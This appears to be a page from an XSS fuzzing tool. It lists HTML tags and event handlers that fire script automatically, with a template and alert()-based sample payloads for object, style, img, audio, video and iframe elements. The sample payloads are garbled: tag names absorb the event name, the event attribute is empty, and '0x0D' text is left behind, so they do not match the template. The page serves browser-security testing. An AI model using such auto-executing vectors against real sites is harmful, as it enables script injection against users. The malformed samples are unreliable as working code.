XSS vectors that execute automatically

⚠ Browser differences

This vector shows which events fire without user interaction

Created byhackvertor

Created Apr 17, 2024

Updated May 25, 2025

Detecting browser...

CategoryURL Handling

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml

$[data2] placeholderevents

Template used:

<$[data1] src=1 srcdoc=1 data=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]>0x0D
<$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]>

Sample payloads

<object->onerror src=1 srcdoc=1 data=1 href=1 ="alert('object->onerror->')"></object->onerror>0x0D
<object->onerror ="alert('object->onerror->')"></object->onerror>

<style->onload src=1 srcdoc=1 data=1 href=1 ="alert('style->onload->')"></style->onload>0x0D
<style->onload ="alert('style->onload->')"></style->onload>

<img->onerror src=1 srcdoc=1 data=1 href=1 ="alert('img->onerror->')"></img->onerror>0x0D
<img->onerror ="alert('img->onerror->')"></img->onerror>

<audio->onerror src=1 srcdoc=1 data=1 href=1 ="alert('audio->onerror->')"></audio->onerror>0x0D
<audio->onerror ="alert('audio->onerror->')"></audio->onerror>

<audio->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('audio->onloadstart->')"></audio->onloadstart>0x0D
<audio->onloadstart ="alert('audio->onloadstart->')"></audio->onloadstart>

<video->onerror src=1 srcdoc=1 data=1 href=1 ="alert('video->onerror->')"></video->onerror>0x0D
<video->onerror ="alert('video->onerror->')"></video->onerror>

<video->onloadstart src=1 srcdoc=1 data=1 href=1 ="alert('video->onloadstart->')"></video->onloadstart>0x0D
<video->onloadstart ="alert('video->onloadstart->')"></video->onloadstart>

<iframe->onload src=1 srcdoc=1 data=1 href=1 ="alert('iframe->onload->')"></iframe->onload>0x0D
<iframe->onload ="alert('iframe->onload->')"></iframe->onload>

XSS vectors that execute automatically

Sample payloads

Fuzz results

Distributed Fuzzing